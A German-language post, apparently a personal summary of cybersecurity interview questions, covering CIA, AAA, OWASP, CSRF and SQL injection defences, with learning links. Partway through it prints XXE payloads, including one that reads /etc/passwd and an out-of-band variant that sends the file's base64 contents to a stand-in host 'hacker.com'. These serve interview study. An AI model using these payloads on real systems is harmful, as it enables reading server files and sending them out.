
Zusammenfassung der Cyber-Security-Interviewfragen, die ich durchgemacht habe, hoffe, das hilft euch weiter.
Diese Seite ist eine Zusammenfassung der Interviews, die ich durchlaufen habe. Sie deckt eine ganze Bandbreite an Rollen ab. Ich habe zwar mehrere Absagen erhalten, aber aus jedem Interview gelernt, konstruktives Feedback gesammelt und bin vorangekommen.
Ich hoffe, diese Fragen/Tipps können dir helfen.
Die Rollen, die es im Allgemeinen abdeckt, sind wie folgt:
Kurzer Tipp:
Ich habe versucht, unten alle möglichen Fragen festzuhalten, auf die ich gestoßen bin, und für einige davon Antworten bereitgestellt.
Den Rest kannst du googeln, wenn du tiefer eintauchen möchtest. Außerdem gibt es am Ende ein paar Referenzen – wirf einen Blick darauf. Die waren wirklich hilfreich.
Ich würde gerne weitere Fragen hinzufügen, während ich vorankomme und meine Notizen durchgehe. Ich würde mich jedoch über konstruktives Feedback freuen, indem du mich über [email protected] kontaktierst. Wenn dir etwas begegnet, das hier nicht abgedeckt ist, teile es bitte gerne mit.
Was ist CIA?
Was ist AAA?
OWASP Top 10
Was ist XSS (Cross-site Scripting)?
Was ist CSRF?
Das ist die schönste Frage, die jeder zweite Interviewer liebend gerne stellt
Kurzer Tipp: Sei kurz und erkläre die ganze Geschichte nur, wenn danach gefragt wird
Cross-Site Request Forgery (CSRF) ist ein Angriff, der einen Endbenutzer dazu zwingt, unerwünschte Aktionen in einer Webanwendung auszuführen, bei der er aktuell authentifiziert ist. CSRF-Angriffe zielen speziell auf zustandsverändernde Anfragen, nicht auf Datendiebstahl, da der Angreifer keine Möglichkeit hat, die Antwort auf die gefälschte Anfrage zu sehen. Mit ein wenig Social Engineering (z. B. durch das Senden eines Links per E-Mail oder Chat) kann ein Angreifer die Benutzer einer Webanwendung dazu verleiten, Aktionen auszuführen, die der Angreifer gewählt hat. Wenn das Opfer ein normaler Benutzer ist, kann ein erfolgreicher CSRF-Angriff den Benutzer dazu zwingen, zustandsverändernde Anfragen auszuführen, wie z. B. die Überweisung von Geldern, die Änderung der E-Mail-Adresse usw. Wenn das Opfer ein Administratorkonto ist, kann CSRF die gesamte Webanwendung gefährden.
Wie man CSRF bekämpft:
Verwende Anti-CSRF-Tokens
Verwende die Same-Origin-Policy
Verwendung des Referrer-Headers
Was ist HTML-/URL-Encoding?
Ist das HTTP-Protokoll zustandslos?
HTTP ist von Natur aus ein zustandsloses Protokoll, der Server verwendet jedoch Cookies, um es zustandsbehaftet zu machen
Welche Arten von Injections gibt es: SQL, Command, OS
Wie man SQL-Injections bekämpft
Verwende parametrisierte Abfragen und gespeicherte Prozeduren
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>
<stockCheck><productId>&xxe;</productId></stockCheck>
Einzufügen in: document.xml
<!DOCTYPE root [
<!ENTITY % remote SYSTEM "http://hacker.com/evil.dtd">
%remote; %intern; %xxe;
]>
<root>&xxe;</root> - you can change xxe entity to general entity
Externer Host: http://hacker.com/evil.dtd
<!ENTITY % payl SYSTEM "php://filter/read=convert.base64-encode/resource=file:///etc/passwd">
<!ENTITY % intern "<!ENTITY % xxe SYSTEM 'http://hacker.com/result-is?%payl;'>">
--- OR ---
<!ENTITY % intern "<!ENTITY % xxe SYSTEM 'file://%payl;'>"> - consider error-based
Ich werde allgemein in Bezug auf AWS sprechen, es gibt jedoch auch andere Cloud-Anbieter wie Azure, GCP, Digital Ocean usw.
Lernressourcen:
https://regexone.com/ (Reguläre Ausdrücke sind ein Muss!)
https://portswigger.net/web-security/
OWASP Top 10:
https://www.owasp.org/images/7/72/OWASP_Top_10-2017_%28en%29.pdf.pdf
Infosec-Interviewfragen:
https://danielmiessler.com/study/infosec_interview_questions
Top-Pentest-Fragen:
https://resources.infosecinstitute.com/top-30-penetration-tester-pentester-interview-questions-and-answers-for-2019/#gref
Python-Tipps:
https://www.codementor.io/sheena/essential-python-interview-questions-du107ozr6
AWS-Benutzerhandbuch:
https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/concepts.html
SMB- und Samba-Einblick:
https://fitzcarraldoblog.wordpress.com/2016/10/17/a-correct-method-of-configuring-samba-for-browsing-smb-shares-in-a-home-network/